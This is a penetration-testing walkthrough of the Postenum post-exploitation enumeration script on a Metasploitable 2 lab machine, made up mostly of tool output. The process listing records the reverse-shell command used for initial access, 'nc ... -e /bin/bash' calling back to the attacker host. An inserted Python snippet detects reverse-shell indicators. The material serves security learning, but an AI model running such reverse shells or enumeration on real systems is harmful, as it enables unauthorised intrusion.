Gathering Data

To show everything Postenum offers for post-exploitation, we are using Kali Linux as the local machine. For the target, if you want to follow along and try the tool out as a white hat or penetration tester, Metasploitable 2 is a good intentionally vulnerable virtual machine to use.

Stage 1: Initial Compromise

Before using Postenum, we first have to exploit the target. We can use command injection to run operating system commands on the server and abuse that functionality to get a reverse shell.

We want to upgrade the new shell to a fully interactive shell. That makes it easier to work with in general and also gives us tab completion and terminal history. We will assume the target has limited connectivity to the internet, so we need a way to transfer Postenum from our local machine.

First, grab the script from GitHub with wget:

~# wget https://raw.githubusercontent.com/mbahadou/postenum/master/postenum.sh

--2020-06-18 16:14:29--  https://raw.githubusercontent.com/mbahadou/postenum/master/postenum.sh
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.0.133, 151.101.64.133, 151.101.128.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.0.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 56110 (55K) [text/plain]
Saving to: ‘postenum.sh’

postenum.sh          100%[======================>]  54.79K  --.-KB/s    in 0.07s

2020-06-18 16:14:29 (749 KB/s) - ‘postenum.sh’ saved [56110/56110]

Next, we can start a simple server with Python to serve the file over HTTP:

~# python -m SimpleHTTPServer

Serving HTTP on 0.0.0.0 port 8000 ...

Back on the target system, change to a writable directory so we can download and run our script:

target:/var/vulnerabilities/exec$ cd /var/tmp/

target:/var/tmp$

Grab the file we are hosting on our machine, making sure to use the appropriate IP address:

target:/var/tmp$ wget http://10.10.0.1:8000/postenum.sh

--16:16:24--  http://10.10.0.1:8000/postenum.sh
           => `postenum.sh'
Connecting to 10.10.0.1:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 43,831 (43K) [text/x-sh]

100%[=================================================================================================================================================================================================>] 43,831        --.--K/s

16:16:24 (53.19 MB/s) - `postenum.sh' saved [43831/43831]

If everything succeeded, we will see the request where our server is running:

Serving HTTP on 0.0.0.0 port 8000 ...
10.10.0.50 - - [18/Jun/2020 10:49:36] "GET /postenum.sh HTTP/1.0" 200 -

We can kill the server now that the script has been transferred. Then, if we list the contents of the directory, we will see that the script is not yet executable:

target:/var/tmp$ ls -la

total 52
drwxrwxrwt  2 root     root      4096 Jun 16 13:35 .
drwxr-xr-x 14 root     root      4096 Mar 17  2010 ..
-rw-r--r--  1 www-data www-data 43831 Jun 18  2020 postenum.sh

Use the chmod command to make it executable:

target:/var/tmp$ chmod +x postenum.sh

We can see that it is now executable:

target:/var/tmp$ ls -la

total 52
drwxrwxrwt  2 root     root      4096 Jun 16 13:35 .
drwxr-xr-x 14 root     root      4096 Mar 17  2010 ..
-rw-r--r--  1 www-data www-data 43831 Jun 18  2020 postenum.sh

To run it, just use dot-slash as for any Bash script:

target:/var/tmp$ ./postenum.sh

--------------------------------------------------------------------------

                 _
 _ __   ___  ___| |_ ___ _ __  _   _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ ||  __/ | | | |_| | | | | | |  version : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_|

POST-ENUMERATION by mbahadou
--------------------------------------------------------------------------

 postenum - be the ROOT
 For help or reporting issues, visit https://github.com/mbahadou/postenum

 Usage   > ./postenum.sh <option>
 Options >
        -a :    All
        -s :    Filesystem [SUID, SGID, Config/DB files, etc.]
        -l :    Shell escape and development tools
        -c :    The most interesting files
        -n :    Network settings
        -p :    Services and cron jobs
        -o :    OS informations and priv esc exploits
        -v :    Sofware's versions
        -t :    Fstab credentials and databases checker

That gives us a nice little banner and some usage options.

Stage 2: Network Settings

The first option we will cover gathers network information and settings. Use the -n switch to launch it:

target:/var/tmp$ ./postenum.sh -n

--------------------------------------------------------------------------

                 _
 _ __   ___  ___| |_ ___ _ __  _   _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ ||  __/ | | | |_| | | | | | |  version : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_|

POST-ENUMERATION by mbahadou
--------------------------------------------------------------------------

 postenum - be the ROOT
 For help or reporting issues, visit https://github.com/mbahadou/postenum

[-] COMMUNICATING and NETWORKING
[+] - Check NIC(s) does the system have
[x] Available network interfaces on the system:
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).

# The loopback network interface
auto lo
iface lo inet loopback

# The primary network interface
auto eth0
iface eth0 inet static
        address 10.10.0.50
        netmask 255.255.255.0
        gateway 10.10.0.1

[x] Hosts:
127.0.0.1       localhost
127.0.1.1       target.localdomain      target

# The following lines are desirable for IPv6 capable hosts
::1     ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
ff02::3 ip6-allhosts

[+] - Check network configuration settings
[x] DNS name servers:
search localdomain
nameserver 172.16.1.1

[x] Networks:
# symbolic names for networks, see networks(5) for more information
link-local 169.254.0.0

[x] hostname:
target

[x] Get DNS domain or the FQDN:
localdomain

[+] - Check users and hosts communicating with the system
[x] Display all TCP/UDP connected socket, PID/program:
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:512             0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:513             0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:2049            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:514             0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:8009            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:6697            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:41801           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:3306            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:1099            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:6667            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:139             0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:5900            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:6000            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:47536           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:8787            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:8180            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:1524            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN      -
tcp        0      0 10.10.0.50:53           0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:53            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:44182           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:23              0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:5432            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:25              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:953           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:445             0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:51902           0.0.0.0:*               LISTEN      -
tcp        0      0 10.10.0.50:34846        10.10.0.1:1234          ESTABLISHED 4789/bash
tcp6       0      0 :::2121                 :::*                    LISTEN      -
tcp6       0      0 :::3632                 :::*                    LISTEN      -
tcp6       0      0 :::53                   :::*                    LISTEN      -
tcp6       0      0 :::22                   :::*                    LISTEN      -
tcp6       0      0 :::5432                 :::*                    LISTEN      -
tcp6       0      0 ::1:953                 :::*                    LISTEN      -
udp        0      0 0.0.0.0:2049            0.0.0.0:*                           -
udp        0      0 10.10.0.50:137          0.0.0.0:*                           -
udp        0      0 0.0.0.0:137             0.0.0.0:*                           -
udp        0      0 10.10.0.50:138          0.0.0.0:*                           -
udp        0      0 0.0.0.0:138             0.0.0.0:*                           -
udp        0      0 127.0.0.1:47783         127.0.0.1:47783         ESTABLISHED -
udp        0      0 0.0.0.0:36136           0.0.0.0:*                           -
udp        0      0 0.0.0.0:945             0.0.0.0:*                           -
udp        0      0 10.10.0.50:53           0.0.0.0:*                           -
udp        0      0 127.0.0.1:53            0.0.0.0:*                           -
udp        0      0 0.0.0.0:52929           0.0.0.0:*                           -
udp        0      0 0.0.0.0:69              0.0.0.0:*                           -
udp        0      0 0.0.0.0:40927           0.0.0.0:*                           -
udp        0      0 0.0.0.0:55275           0.0.0.0:*                           -
udp        0      0 0.0.0.0:111             0.0.0.0:*                           -
udp6       0      0 :::53                   :::*                                -
udp6       0      0 :::50653                :::*                                -

[x] List files based on their Internet address:
COMMAND  PID     USER   FD   TYPE DEVICE SIZE NODE NAME
bash    4789 www-data    0u  IPv4  12807       TCP 10.10.0.50:34846->10.10.0.1:1234 (ESTABLISHED)
bash    4789 www-data    1u  IPv4  12807       TCP 10.10.0.50:34846->10.10.0.1:1234 (ESTABLISHED)
python  4797 www-data    0u  IPv4  12807       TCP 10.10.0.50:34846->10.10.0.1:1234 (ESTABLISHED)
python  4797 www-data    1u  IPv4  12807       TCP 10.10.0.50:34846->10.10.0.1:1234 (ESTABLISHED)

[x] Last logged in users:
root     pts/0        :0.0             Wed Jun 17 13:22   still logged in
reboot   system boot  2.6.24-16-server Wed Jun 17 13:21 - 13:43  (00:21)
msfadmin tty1                          Wed Jun 17 15:40 - down   (00:00)
msfadmin tty1                          Wed Jun 17 15:40 - 15:40  (00:00)

wtmp begins Wed Jun 18 15:38:50 2020

[x] Who is logged on and what they are doing:
 13:43:00 up 22 min,  1 user,  load average: 0.02, 0.04, 0.07
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
root     pts/0    :0.0             13:22   21:03m  0.05s  0.05s -bash

[+] - Check cached IP and/or MAC addresses

We can see it gives us a lot of information, starting with the network interfaces, the hostname and the addresses. Then it shows us some DNS information and any symbolic names for networks. Finally, it shows us the hosts and users communicating with the system, followed by the logged-in users and related information.
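The ESTABLISHED socket owned by `bash` in the netstat output, and the `bash` and `python` entries in the lsof output whose file descriptors 0 and 1 point at a remote TCP socket, are exactly the indicators a defender looks for when hunting for a reverse shell on a host. The following Python check is an added example, not part of the original article or of the Postenum project: it parses constructed sample lines modelled on that output and flags them. The `SHELL_LIKE` set, the `Finding` type and the sample text are assumptions of this example.

```python
"""Reverse-shell indicators from netstat/lsof style output (added example).

The sample text below is constructed to mirror the columns that
`netstat -antup` and `lsof -i` print on the target in the walkthrough;
it is not captured output from the article.
"""
import re
from dataclasses import dataclass

# Shells and interpreters that should not own a remote TCP session
# as their own stdin/stdout (assumed list for this example).
SHELL_LIKE = {"bash", "sh", "dash", "zsh", "python", "python3",
              "perl", "ruby", "nc", "ncat"}

# Constructed netstat-style sample: one web server, one DB, one reverse
# shell (bash -> 10.10.0.1:1234) and one legitimate inbound SSH session.
NETSTAT_SAMPLE = """\
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:3306            0.0.0.0:*               LISTEN      -
tcp        0      0 10.10.0.50:34846        10.10.0.1:1234          ESTABLISHED 4789/bash
tcp        0      0 10.10.0.50:22           10.10.0.7:51000         ESTABLISHED 4116/sshd
"""

# Constructed lsof-style sample: the shell and the pty spawner share the
# socket as fd 0/1; sshd holds its socket on fd 3, which is normal.
LSOF_SAMPLE = """\
COMMAND  PID     USER   FD   TYPE DEVICE SIZE NODE NAME
bash    4789 www-data    0u  IPv4  12807       TCP 10.10.0.50:34846->10.10.0.1:1234 (ESTABLISHED)
bash    4789 www-data    1u  IPv4  12807       TCP 10.10.0.50:34846->10.10.0.1:1234 (ESTABLISHED)
python  4797 www-data    0u  IPv4  12807       TCP 10.10.0.50:34846->10.10.0.1:1234 (ESTABLISHED)
sshd    4116     root    3u  IPv4  12990       TCP 10.10.0.50:22->10.10.0.7:51000 (ESTABLISHED)
"""


@dataclass(frozen=True)
class Finding:
    pid: int
    program: str
    local: str
    remote: str
    reason: str


# TCP rows only; rows whose owner is "-" (unreadable PID) do not match.
NETSTAT_RE = re.compile(
    r"^(?P<proto>tcp6?)\s+\d+\s+\d+\s+(?P<local>\S+)\s+(?P<remote>\S+)\s+"
    r"(?P<state>\S+)\s+(?P<pid>\d+)/(?P<prog>\S+)"
)

# COMMAND PID USER FD TYPE DEVICE [SIZE] NODE NAME, NAME being local->remote (STATE).
LSOF_RE = re.compile(
    r"^(?P<cmd>\S+)\s+(?P<pid>\d+)\s+(?P<user>\S+)\s+(?P<fd>\d+)[rwu]\s+IPv[46]\s+\S+\s+"
    r"(?:\S+\s+)?TCP\s+(?P<local>\S+)->(?P<remote>\S+)\s+\((?P<state>\w+)\)"
)


def netstat_findings(text: str) -> list[Finding]:
    """Flag ESTABLISHED TCP sessions whose owning program is a shell or interpreter."""
    out = []
    for line in text.splitlines():
        m = NETSTAT_RE.match(line)
        if m and m.group("state") == "ESTABLISHED" and m.group("prog") in SHELL_LIKE:
            out.append(Finding(int(m.group("pid")), m.group("prog"), m.group("local"),
                               m.group("remote"), "shell/interpreter owns an ESTABLISHED TCP session"))
    return out


def lsof_findings(text: str) -> list[Finding]:
    """Flag shells/interpreters whose stdin, stdout or stderr (fd 0-2) is a TCP socket."""
    out = []
    for line in text.splitlines():
        m = LSOF_RE.match(line)
        if not m:
            continue
        fd = int(m.group("fd"))
        if fd <= 2 and m.group("cmd") in SHELL_LIKE:
            out.append(Finding(int(m.group("pid")), m.group("cmd"), m.group("local"),
                               m.group("remote"), f"fd {fd} of {m.group('cmd')} is a remote TCP socket"))
    return out


def reverse_shell_pids(netstat_text: str, lsof_text: str) -> set[int]:
    """PIDs flagged by either view; either source alone is enough to raise an alert."""
    return {f.pid for f in netstat_findings(netstat_text) + lsof_findings(lsof_text)}


if __name__ == "__main__":
    for f in netstat_findings(NETSTAT_SAMPLE) + lsof_findings(LSOF_SAMPLE):
        print(f"pid {f.pid} ({f.program}) {f.local} -> {f.remote}: {f.reason}")
    print("suspicious PIDs:", sorted(reverse_shell_pids(NETSTAT_SAMPLE, LSOF_SAMPLE)))
```

On a live host the same two functions can be fed the real output of `netstat -antup` and `lsof -i`, which need root to show the PID column for every socket.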

Stage 3: Services and Cron Jobs

The next option we will look at discovers running services and any cron jobs present on the system. Use the -p switch for this:

target:/var/tmp$ ./postenum.sh -p

--------------------------------------------------------------------------

                 _
 _ __   ___  ___| |_ ___ _ __  _   _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ ||  __/ | | | |_| | | | | | |  version : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_|

POST-ENUMERATION by mbahadou
--------------------------------------------------------------------------

 postenum - be the ROOT
 For help or reporting issues, visit https://github.com/mbahadou/postenum

[-] APPS and SERVICES
[+] - Check jobs scheduled
[x] Search on cron in /etc:
drwxr-xr-x  2 root     root     4096 Jul  5  2018 cron.d
drwxr-xr-x  2 root     root     4096 Apr 28  2010 cron.daily
drwxr-xr-x  2 root     root     4096 Mar 16  2010 cron.hourly
drwxr-xr-x  2 root     root     4096 Apr 28  2010 cron.monthly
drwxr-xr-x  2 root     root     4096 Mar 16  2010 cron.weekly
-rw-r--r--  1 root     root      724 Apr  8  2008 crontab

[x] List /etc/cron.d/
-rw-r--r-- 1 root root  507 May  3  2012 php5
-rw-r--r-- 1 root root 1323 Mar 31  2008 postgresql-common

[x] Root's cron jobs:
no crontab for www-data

[x] The content of /etc/crontab:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

[x] View daily cron jobs:
-rwxr-xr-x 1 root root  633 Feb  1  2008 apache2
-rwxr-xr-x 1 root root 7441 Apr 22  2008 apt
-rwxr-xr-x 1 root root  314 Apr  4  2008 aptitude
-rwxr-xr-x 1 root root  502 Dec 12  2007 bsdmainutils
-rwxr-xr-x 1 root root   89 Jun 17  2006 logrotate
-rwxr-xr-x 1 root root  954 Mar 12  2008 man-db
-rwxr-xr-x 1 root root  183 Mar  8  2008 mlocate
-rwxr-xr-x 1 root root  383 Apr 28  2010 samba
-rwxr-xr-x 1 root root 3295 Apr  8  2008 standard
-rwxr-xr-x 1 root root 1309 Nov 23  2007 sysklogd
-rwxr-xr-x 1 root root  477 Dec  7  2008 tomcat55

[x] View monthly cron jobs:
-rwxr-xr-x 1 root root 664 Feb 20  2008 proftpd
-rwxr-xr-x 1 root root 129 Apr  8  2008 standard

[x] View weekly cron jobs:
-rwxr-xr-x 1 root root  528 Mar 12  2008 man-db
-rwxr-xr-x 1 root root 2522 Jan 28  2008 popularity-contest
-rwxr-xr-x 1 root root 1220 Nov 23  2007 sysklogd

[+] - Check for running services, and which service(s) are been running by root
[x] Display every process on the system:
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.1  0.6   2844  1696 ?        Ss   13:20   0:01 /sbin/init
root         2  0.0  0.0      0     0 ?        S<   13:20   0:00 [kthreadd]
root         3  0.0  0.0      0     0 ?        S<   13:20   0:00 [migration/0]
root         4  0.0  0.0      0     0 ?        S<   13:20   0:00 [ksoftirqd/0]
root         5  0.0  0.0      0     0 ?        S<   13:20   0:00 [watchdog/0]
root         6  0.0  0.0      0     0 ?        S<   13:20   0:00 [events/0]
root         7  0.0  0.0      0     0 ?        S<   13:20   0:00 [khelper]
root        41  0.0  0.0      0     0 ?        S<   13:20   0:00 [kblockd/0]
root        44  0.0  0.0      0     0 ?        S<   13:20   0:00 [kacpid]
root        45  0.0  0.0      0     0 ?        S<   13:20   0:00 [kacpi_notify]
root        88  0.0  0.0      0     0 ?        S<   13:20   0:00 [kseriod]
root       125  0.0  0.0      0     0 ?        S    13:20   0:00 [pdflush]
root       126  0.0  0.0      0     0 ?        S    13:20   0:00 [pdflush]
root       127  0.0  0.0      0     0 ?        S<   13:20   0:00 [kswapd0]
root       169  0.0  0.0      0     0 ?        S<   13:20   0:00 [aio/0]
root      1125  0.0  0.0      0     0 ?        S<   13:20   0:00 [ksnapd]
root      1316  0.0  0.0      0     0 ?        S<   13:20   0:00 [ata/0]
root      1318  0.0  0.0      0     0 ?        S<   13:20   0:00 [ata_aux]
root      1327  0.0  0.0      0     0 ?        S<   13:20   0:00 [scsi_eh_0]
root      1340  0.0  0.0      0     0 ?        S<   13:20   0:00 [scsi_eh_1]
root      1345  0.0  0.0      0     0 ?        S<   13:20   0:00 [ksuspend_usbd]
root      1353  0.0  0.0      0     0 ?        S<   13:20   0:00 [khubd]
root      1771  0.0  0.0      0     0 ?        S<   13:20   0:00 [scsi_eh_2]
root      2295  0.0  0.0      0     0 ?        S<   13:20   0:00 [kjournald]
root      2460  0.0  0.2   2216   652 ?        S<s  13:20   0:01 /sbin/udevd --daemon
root      2706  0.0  0.0      0     0 ?        S<   13:20   0:00 [kpsmoused]
root      3588  0.0  0.0      0     0 ?        S<   13:21   0:00 [kjournald]
daemon    3717  0.0  0.2   1836   524 ?        Ss   13:21   0:00 /sbin/portmap
statd     3737  0.0  0.2   1900   728 ?        Ss   13:21   0:00 /sbin/rpc.statd
root      3743  0.0  0.0      0     0 ?        S<   13:21   0:00 [rpciod/0]
root      3758  0.0  0.2   3648   564 ?        Ss   13:21   0:00 /usr/sbin/rpc.idmapd
root      3985  0.0  0.1   1716   488 tty4     Ss+  13:21   0:00 /sbin/getty 38400 tty4
root      3986  0.0  0.1   1716   492 tty5     Ss+  13:21   0:00 /sbin/getty 38400 tty5
root      3990  0.0  0.1   1716   488 tty2     Ss+  13:21   0:00 /sbin/getty 38400 tty2
root      3993  0.0  0.1   1716   492 tty3     Ss+  13:21   0:00 /sbin/getty 38400 tty3
root      3996  0.0  0.1   1716   488 tty6     Ss+  13:21   0:00 /sbin/getty 38400 tty6
syslog    4034  0.0  0.2   1936   648 ?        Ss   13:21   0:00 /sbin/syslogd -u syslog
root      4069  0.0  0.2   1872   540 ?        S    13:21   0:00 /bin/dd bs 1 if /proc/kmsg of /var/run/klogd/kmsg
klog      4071  0.0  0.8   3152  2052 ?        Ss   13:21   0:00 /sbin/klogd -P /var/run/klogd/kmsg
bind      4094  0.0  3.0  35408  7676 ?        Ssl  13:21   0:00 /usr/sbin/named -u bind
root      4116  0.0  0.3   5312   996 ?        Ss   13:21   0:00 /usr/sbin/sshd
root      4193  0.0  0.5   2768  1304 ?        S    13:21   0:00 /bin/sh /usr/bin/mysqld_safe
mysql     4235  0.1  6.6 127560 17036 ?        Sl   13:21   0:02 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock
root      4236  0.0  0.2   1700   556 ?        S    13:21   0:00 logger -p daemon.err -t mysqld_safe -i -t mysqld
postgres  4323  0.1  1.9  41340  5068 ?        S    13:21   0:01 /usr/lib/postgresql/8.3/bin/postgres -D /var/lib/postgresql/8.3/main -c config_file=/etc/postgresql/8.3/main/postgresql.conf
postgres  4326  0.2  0.5  41340  1376 ?        Ss   13:21   0:03 postgres: writer process
postgres  4327  0.2  0.4  41340  1188 ?        Ss   13:21   0:03 postgres: wal writer process
postgres  4328  0.0  0.5  41476  1432 ?        Ss   13:21   0:01 postgres: autovacuum launcher process
postgres  4329  0.0  0.4  12660  1172 ?        Ss   13:21   0:00 postgres: stats collector process
daemon    4349  0.0  0.1   2316   424 ?        SNs  13:21   0:00 distccd --daemon --user daemon --allow 0.0.0.0/0
daemon    4350  0.0  0.0   2316   216 ?        SN   13:21   0:00 distccd --daemon --user daemon --allow 0.0.0.0/0
root      4399  0.0  0.0      0     0 ?        S    13:21   0:00 [lockd]
root      4400  0.0  0.0      0     0 ?        S<   13:21   0:00 [nfsd4]
root      4401  0.0  0.0      0     0 ?        S    13:21   0:00 [nfsd]
root      4402  0.0  0.0      0     0 ?        S    13:21   0:00 [nfsd]
root      4403  0.0  0.0      0     0 ?        S    13:21   0:00 [nfsd]
root      4404  0.0  0.0      0     0 ?        S    13:21   0:00 [nfsd]
root      4405  0.0  0.0      0     0 ?        S    13:21   0:00 [nfsd]
root      4406  0.0  0.0      0     0 ?        S    13:21   0:00 [nfsd]
root      4407  0.0  0.0      0     0 ?        S    13:21   0:00 [nfsd]
root      4408  0.0  0.0      0     0 ?        S    13:21   0:00 [nfsd]
root      4412  0.0  0.1   2424   332 ?        Ss   13:21   0:00 /usr/sbin/rpc.mountd
daemon    4437  0.0  0.0   2316   216 ?        SN   13:21   0:00 distccd --daemon --user daemon --allow 0.0.0.0/0
daemon    4479  0.0  0.0   2316   216 ?        SN   13:21   0:00 distccd --daemon --user daemon --allow 0.0.0.0/0
root      4480  0.0  0.6   5412  1728 ?        Ss   13:21   0:00 /usr/lib/postfix/master
postfix   4484  0.0  0.6   5420  1644 ?        S    13:21   0:00 pickup -l -t fifo -u -c
postfix   4485  0.0  0.6   5460  1688 ?        S    13:21   0:00 qmgr -l -t fifo -u
root      4487  0.0  0.4   5388  1204 ?        Ss   13:21   0:00 /usr/sbin/nmbd -D
root      4489  0.0  0.5   7724  1364 ?        Ss   13:21   0:00 /usr/sbin/smbd -D
root      4493  0.0  0.3   7724   812 ?        S    13:21   0:00 /usr/sbin/smbd -D
root      4508  0.0  0.3   2424   856 ?        Ss   13:21   0:00 /usr/sbin/xinetd -pidfile /var/run/xinetd.pid -stayalive -inetd_compat
proftpd   4545  0.0  0.6   9948  1592 ?        Ss   13:21   0:00 proftpd: (accepting connections)
daemon    4559  0.0  0.1   1984   424 ?        Ss   13:21   0:00 /usr/sbin/atd
root      4570  0.0  0.3   2104   896 ?        Ss   13:21   0:00 /usr/sbin/cron
root      4598  0.0  0.1   2052   348 ?        Ss   13:21   0:00 /usr/bin/jsvc -user tomcat55 -cp /usr/share/java/commons-daemon.jar:/usr/share/tomcat5.5/bin/bootstrap.jar -outfile SYSLOG -errfile SYSLOG -pidfile /var/run/tomcat5.5.pid -Djava.awt.headless=true -Xmx128M -Djava.endorsed.dirs=/usr/share/tomcat5.5/common/endorsed -Dcatalina.base=/var/lib/tomcat5.5 -Dcatalina.home=/usr/share/tomcat5.5 -Djava.io.tmpdir=/var/lib/tomcat5.5/temp -Djava.security.manager -Djava.security.policy=/var/lib/tomcat5.5/conf/catalina.policy org.apache.catalina.startup.Bootstrap
root      4599  0.0  0.1   2052   476 ?        S    13:21   0:00 /usr/bin/jsvc -user tomcat55 -cp /usr/share/java/commons-daemon.jar:/usr/share/tomcat5.5/bin/bootstrap.jar -outfile SYSLOG -errfile SYSLOG -pidfile /var/run/tomcat5.5.pid -Djava.awt.headless=true -Xmx128M -Djava.endorsed.dirs=/usr/share/tomcat5.5/common/endorsed -Dcatalina.base=/var/lib/tomcat5.5 -Dcatalina.home=/usr/share/tomcat5.5 -Djava.io.tmpdir=/var/lib/tomcat5.5/temp -Djava.security.manager -Djava.security.policy=/var/lib/tomcat5.5/conf/catalina.policy org.apache.catalina.startup.Bootstrap
tomcat55  4601  5.3 44.8 389632 114652 ?       Sl   13:21   1:12 /usr/bin/jsvc -user tomcat55 -cp /usr/share/java/commons-daemon.jar:/usr/share/tomcat5.5/bin/bootstrap.jar -outfile SYSLOG -errfile SYSLOG -pidfile /var/run/tomcat5.5.pid -Djava.awt.headless=true -Xmx128M -Djava.endorsed.dirs=/usr/share/tomcat5.5/common/endorsed -Dcatalina.base=/var/lib/tomcat5.5 -Dcatalina.home=/usr/share/tomcat5.5 -Djava.io.tmpdir=/var/lib/tomcat5.5/temp -Djava.security.manager -Djava.security.policy=/var/lib/tomcat5.5/conf/catalina.policy org.apache.catalina.startup.Bootstrap
root      4619  0.0  1.0  10596  2564 ?        Ss   13:21   0:00 /usr/sbin/apache2 -k start
www-data  4621  0.0  0.9  10728  2516 ?        S    13:21   0:00 /usr/sbin/apache2 -k start
www-data  4624  0.0  0.9  10728  2492 ?        S    13:21   0:00 /usr/sbin/apache2 -k start
www-data  4626  0.0  0.8  10596  2096 ?        S    13:21   0:00 /usr/sbin/apache2 -k start
www-data  4628  0.0  0.9  10596  2436 ?        S    13:21   0:00 /usr/sbin/apache2 -k start
www-data  4629  0.0  0.9  10728  2500 ?        S    13:21   0:00 /usr/sbin/apache2 -k start
root      4638  0.0 10.3  66344 26472 ?        Sl   13:21   0:00 /usr/bin/rmiregistry
root      4642  0.5  1.0  12208  2568 ?        Sl   13:21   0:08 ruby /usr/sbin/druby_timeserver.rb
root      4649  0.0  0.1   1716   488 tty1     Ss+  13:21   0:00 /sbin/getty 38400 tty1
root      4657  0.0  0.9   8540  2372 ?        S    13:21   0:01 /usr/bin/unrealircd
root      4659  0.3  4.7  14036 12016 ?        S    13:21   0:04 Xtightvnc :0 -desktop X -auth /root/.Xauthority -geometry 1024x768 -depth 24 -rfbwait 120000 -rfbauth /root/.vnc/passwd -rfbport 5900 -fp /usr/X11R6/lib/X11/fonts/Type1/,/usr/X11R6/lib/X11/fonts/Speedo/,/usr/X11R6/lib/X11/fonts/misc/,/usr/X11R6/lib/X11/fonts/75dpi/,/usr/X11R6/lib/X11/fonts/100dpi/,/usr/share/fonts/X11/misc/,/usr/share/fonts/X11/Type1/,/usr/share/fonts/X11/75dpi/,/usr/share/fonts/X11/100dpi/ -co /etc/X11/rgb
root      4664  0.0  0.4   2724  1188 ?        S    13:21   0:00 /bin/sh /root/.vnc/xstartup
root      4667  0.0  1.0   5936  2572 ?        S    13:21   0:00 xterm -geometry 80x24+10+10 -ls -title X Desktop
root      4670  0.3  1.9   8988  5000 ?        S    13:21   0:05 fluxbox
root      4704  0.0  0.6   2852  1544 pts/0    Ss+  13:22   0:00 -bash
www-data  4759  0.0  0.7  10596  1956 ?        S    13:23   0:00 /usr/sbin/apache2 -k start
www-data  4780  0.0  0.7  10596  1956 ?        S    13:29   0:00 /usr/sbin/apache2 -k start
www-data  4787  0.0  0.5   3248  1460 ?        S    13:29   0:00 sh -c ping  -c 3 localhost && nc 10.10.0.1 1234 -e /bin/bash
www-data  4789  0.0  0.5   3248  1448 ?        S    13:29   0:00 bash
www-data  4797  0.0  0.9   3960  2472 ?        S    13:31   0:00 python -c import pty;pty.spawn("/bin/bash")
www-data  4798  0.0  0.7   3400  1868 pts/1    Ss   13:31   0:00 /bin/bash
www-data  4927  0.0  0.7   3644  1888 pts/1    S+   13:44   0:00 /bin/bash ./postenum.sh -p
www-data  4956  0.0  0.4   3616  1204 pts/1    S+   13:44   0:00 /bin/bash ./postenum.sh -p
www-data  4957  0.0  0.3   2364   932 pts/1    R+   13:44   0:00 ps aux

[x] Process binaries and permissions:
692K -rwxr-xr-x 1 root root 686K Apr 14  2008 /bin/bash
 48K -rwxr-xr-x 1 root root  48K Apr  4  2008 /bin/dd
   0 lrwxrwxrwx 1 root root    4 Apr 28  2010 /bin/sh -> bash
 16K -rwxr-xr-x 1 root root  15K Apr 14  2008 /sbin/getty
